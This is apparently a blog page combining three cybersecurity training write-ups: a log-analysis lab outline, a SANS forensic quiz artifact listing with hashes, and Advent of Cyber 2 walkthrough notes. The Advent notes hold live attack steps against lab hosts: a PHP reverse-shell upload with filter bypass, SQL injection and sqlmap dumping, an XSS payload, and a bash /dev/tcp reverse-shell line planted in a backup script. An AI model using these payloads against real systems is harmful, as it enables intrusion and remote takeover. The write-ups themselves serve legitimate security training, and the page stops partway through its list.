Hero Image
Hammered (Log Analysis)

https://cyberdefenders.org/labs/42 Contents Initial Analysis Initial Findings Manipulating the Logs auth.log - sorted by command then time auth.log - all unique lines sorted by command (excluding timestamp) auth.log - extract commands auth.log - extract IPs www-access.log - extract IPs www-access.log - extract user agents Questions #1 Which service did the attackers use to gain access to the system? #2 What is the operating system version of the targeted system? (one word) #3 What is the name of the compromised account #4 #5 Consider that each unique IP represents a different attacker. How many attackers were able to get access to the system? #6 Which attackers IP address successfully logged into the system the most number of times? #7 How many requests were sent to the Apache Server? #8 How many rules have been added to the firewall? #9 One of the downloaded files to the target system is a scanning tool. Provide the tool name. #10 When was the last login from the attacker with IP 219.150.161.20? #11 The database displayed two warning messages, provide the most important and dangerous one. #12 Multiple accounts were created on the target system. Which one was created on Apr 26 04:43:15? #13 Few attackers were using a proxy to run their scans. What is the corresponding user-agent used by this proxy? Failures Initial Analysis When we first unzip the archive, we get a large number of files. The challenge description says there are only five files (although apache2 is a folder containing three files, so seven in total); however, I found some answers are not in those seven files, so we need to consider all the files in the archive. However, most are in those primary five/seven.

Hero Image
SANS April 2021 Forensic Quiz

https://isc.sans.edu/forums/diary/April+2021+Forensic+Quiz/27266/ Introduction Artifacts Excel-related Executables and DLLs Scheduled Task Pcaps Export objects Traffic Summary SHAs Introduction We’re provided with a .pcap and a bunch of artifacts (files). The AD, we’re told, is as follows: LAN segment range: 192.168.5.0/24 (192.168.5.0 through 192.168.5.255) Domain: clockwater.net Domain Controller: 192.168.5.5 - Clockwater-DC LAN segment gateway: 192.168.5.1 LAN segment broadcast address: 192.168.5.255 Artifacts First, let’s inspect the artifacts. $ find . -type f -exec ls -l -- {} + 242176 Mar 29 23:22 ./ProgramData/huqvg/huqvg.exe 49152 Mar 29 23:18 ./Users/Public/4123.do1 65545 Mar 29 23:22 ./Users/Public/4123.xlsb 65545 Mar 29 23:21 ./Users/Public/4123.xsg 299520 Mar 29 23:58 ./Users/wilmer.coughlin/AppData/Local/Temp/C618.tmp.dll 181413 Mar 29 23:17 ./Users/wilmer.coughlin/Downloads/subscription_1617056233.xlsb 4326 Mar 31 18:19 './Windows/System32/Tasks/Sun SvcRestartTask#32640' 251904 Mar 30 00:07 ./Windows/Temp/adf/anchorAsjuster_x64.exe 347648 Mar 30 00:08 ./Windows/Temp/adf/anchorDNS_x64.exe 347648 Mar 30 03:31 ./Windows/Temp/adf/anchor_x64.exe $ find . -type f -exec file -- {} + ./Users/wilmer.coughlin/Downloads/subscription_1617056233.xlsb: Microsoft Excel 2007+ ./Users/wilmer.coughlin/AppData/Local/Temp/C618.tmp.dll: PE32+ executable (DLL) (GUI) x86-64, for MS Windows ./Users/Public/4123.xsg: ASCII text, with very long lines, with CRLF line terminators ./Users/Public/4123.xlsb: ASCII text, with very long lines, with CRLF line terminators ./Users/Public/4123.do1: PE32 executable (DLL) (GUI) Intel 80386, for MS Wins ./Windows/System32/Tasks/Sun SvcRestartTask#32640: XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators ./Windows/Temp/adf/anchorDNS_x64.exe: PE32+ executable (GUI) x86-64, for MS Windows ./Windows/Temp/adf/anchorAsjuster_x64.exe: PE32+ executable (console) x86-64, for MS Windows ./Windows/Temp/adf/anchor_x64.exe: PE32+ executable (GUI) x86-64, for MS Windows ./ProgramData/huqvg/huqvg.exe: PE32+ executable (GUI) x86-64, for MS Windows $ find . -type f -exec sha256sum -- {} + ae6dbc08e0e21b217352175f916cfd5269c4fd8d5de6bff2d0a93a366f78e8d1 ./Users/wilmer.coughlin/Downloads/subscription_1617056233.xlsb cc74f7e82eb33a14ffdea343a8975d8a81be151ffcb753cb3f3be10242c8a252 ./Users/wilmer.coughlin/AppData/Local/Temp/C618.tmp.dll 92bb3324b68e8780d718ed808cb9633dc1ef1f7988d2b85cc0f9f431ed63a63d ./Users/Public/4123.xsg 92bb3324b68e8780d718ed808cb9633dc1ef1f7988d2b85cc0f9f431ed63a63d ./Users/Public/4123.xlsb 93cc5e6a6b671d9b0124ade32ae8b09269de9f03c5c5e66347fbfc7a8c3b305e ./Users/Public/4123.do1 6b7de7ab79ef0f15d7c03536ad6403e317ae5712898957e0ae2ba6f41bf89828 ./Windows/System32/Tasks/Sun SvcRestartTask#32640 9fdbd76141ec43b6867f091a2dca503edb2a85e4b98a4500611f5fe484109513 ./Windows/Temp/adf/anchorDNS_x64.exe 3ab8a1ee10bd1b720e1c8a8795e78cdc09fec73a6bb91526c0ccd2dc2cfbc28d ./Windows/Temp/adf/anchorAsjuster_x64.exe a8a8c66b155fcf9bfdf34ba0aca98991440c3d34b8a597c3fdebc8da251c9634 ./Windows/Temp/adf/anchor_x64.exe 291c573996c647508544e8e21bd2764e6e4c834d53d6d2c8903a0001c783764b ./ProgramData/huqvg/huqvg.exe It looks like we have some executables, some Excel-related files, a .dll, and a scheduled task in XML format.

Hero Image
Advent of Cyber 2

The first 23 days are simple bullet points describing how to do the task. Day 24 is a more complete write-up, as it was a more complete challenge! Table of Contents [Day 1] Web Exploitation: A Christmas Crisis [encoding] [Day 2] Web Exploitation: The Elf Strikes Back! [file upload] [Day 3] Web Exploitation: Christmas Chaos [brute force] [Day 4] Web Exploitation: Santas watching [brute force / fuzzing] [Day 5] Web Exploitation: Someone stole Santas gift list! [SQLi] [Day 6] Web Exploitation: Be careful with what you wish on a Christmas night [XSS] [Day 7] Networking: The Grinch Really Did Steal Christmas [pcap] [Day 8] Networking: Whats Under the Christmas Tree? [nmap] [Day 9] Networking: Anyone can be Santa! [ftp] [Day 10] Networking: Dont be sElfish! [Samba] [Day 11] Networking: The Rogue Gnome [SUID] [Day 12] Networking: Ready, set, elf. [msf] [Day 13] Special by John Hammond: Coal for Christmas [manual exploit] [Day 14] Special by TheCyberMentor: Wheres Rudolph? [OSINT] [Day 15] Scripting: Theres a Python in my stocking! [Python] [Day 16] Scripting: Help! Where is Santa? [Python] [Day 17] Reverse Engineering: ReverseELFneering [RE x86] [Day 18] Reverse Engineering: The Bits of Christmas [RE .NET] [Day 19] Special by Tib3rius: The Naughty or Nice List [SSRF] [Day 20] Blue Teaming: PowershELlF to the rescue [PowerShell] [Day 21] Blue Teaming: Time for some ELForensics [strings, ADS, wmic] [Day 22] Blue Teaming: Elf McEager becomes CyberElf [CyberChef] [Day 23] Blue Teaming The Grinch strikes again! [vss] [Day 24] Special by DarkStar The Trial Before Christmas [lots!] [Day 1] Web Exploitation: A Christmas Crisis [encoding] Register and log in Check cookies Decode using Cyberchef All numbers and early-in-the-alphabet letters → hex Recognise format Adjust username and re-encode using Cyberchef Replace cookie value and refresh page Turn everything on → success! [Day 2] Web Exploitation: The Elf Strikes Back! [file upload] Create exploit script as described Go to URL including GET request http://<url>/?id=<id-token> Check source code for upload types Rename script to bypass filter $ mv php-reverse-shell.php php-reverse-shell.jpg.php Upload file. Simple message “File received successfully!” Check Burp Suite history - the POST was to /upload, so perhaps /uploads/? Test: http://10.10.35.237/uploads/ → success! Also checked page source, find http://10.10.35.237/assets/js/upload.js. It’s obfuscated, but so use https://beautifier.io/ and http://jsnice.org/ to make sense of it. However, doesn’t seem to give much. Hints suggest using a directory brute-forcer Set up netcat listener: $ sudo nc -lvnp 443 Click file from http://10.10.35.237/uploads/, or visit full URL http://10.10.35.237/uploads/php-reverse-shell.jpg.php Check netcat, find shell sh-4.4$ cat /var/www/flag.txt → success! [Day 3] Web Exploitation: Christmas Chaos [brute force] Follow instructions to use Burp Suite to crack Intercept login Send to Intruder Clust Bomb Set Payloads Attack One result has different length returned → success! [Day 4] Web Exploitation: Santa’s watching [brute force / fuzzing] wfuzz -c -z file,big.txt http://shibes.xyz/api.php?breed=FUZZ $ gobuster dir -u http://10.10.176.185/ -w /usr/share/wordlists/dirb/common.txt -x php. Found /api, which led to http://10.10.176.185/api/site-log.php → success! $ wfuzz -c -z file,wordlist http://10.10.176.185/api/site-log.php?date=FUZZ (wordlist downloaded from THM). Only one had any characters → success! [Day 5] Web Exploitation: Someone stole Santa’s gift list! [SQLi] Find login page. Not /login or /login.php. Nothing in source. Check hint. Attempt login using Burp Suite browser, find POST in HTTP history and send to Repeater, then save as panel_login. $ sqlmap -r panel_login --batch Meanwhile, try the obvious SQLi: santa:' or 1=1 -- → success! Try the same ' or 1=1 -- in the panel → success! Same the gift database POST request (as above) as gift_db $ sqlmap -r gift_db --batch --dump → success! [Day 6] Web Exploitation: Be careful with what you wish on a Christmas night [XSS] Run manual test: Add wish of <script>alert('xss');</script>, refresh page, get alert box → XSS Use ZAP Automated Scan as suggested [Day 7] Networking: The Grinch Really Did Steal Christmas [pcap] ICMP to view pings http.request.method == GET to view HTTP GETs frame contains password to find the FTP cleartext password Export objects to find the wishlist [Day 8] Networking: What’s Under the Christmas Tree? [nmap] $ sudo nmap -A 10.10.27.82 -T4 -v → success! [Day 9] Networking: Anyone can be Santa! [ftp] $ ftp 10.10.222.6 → anonymous ftp> ls -la to view current directory contents ftp> cd public then view current directory contents ftp> get shoppinglist.txt to download the file, then view it with $ cat ftp> get backup.sh then edit to include bash -i >& /dev/tcp/10.4.5.126/4242 0>&1 $ nc -lvnp 4242 then wait for shell root@tbfc-ftp-01:~# cat /root/flag.txt → success! [Day 10] Networking: Don’t be sElfish! [Samba] $ enum4linux -a 10.10.122.80 to see what’s available $ smbclient //10.10.122.80/tbfc-santa to access share (no password) [Day 11] Networking: The Rogue Gnome [SUID] find / -perm -u=s -type f 2>/dev/null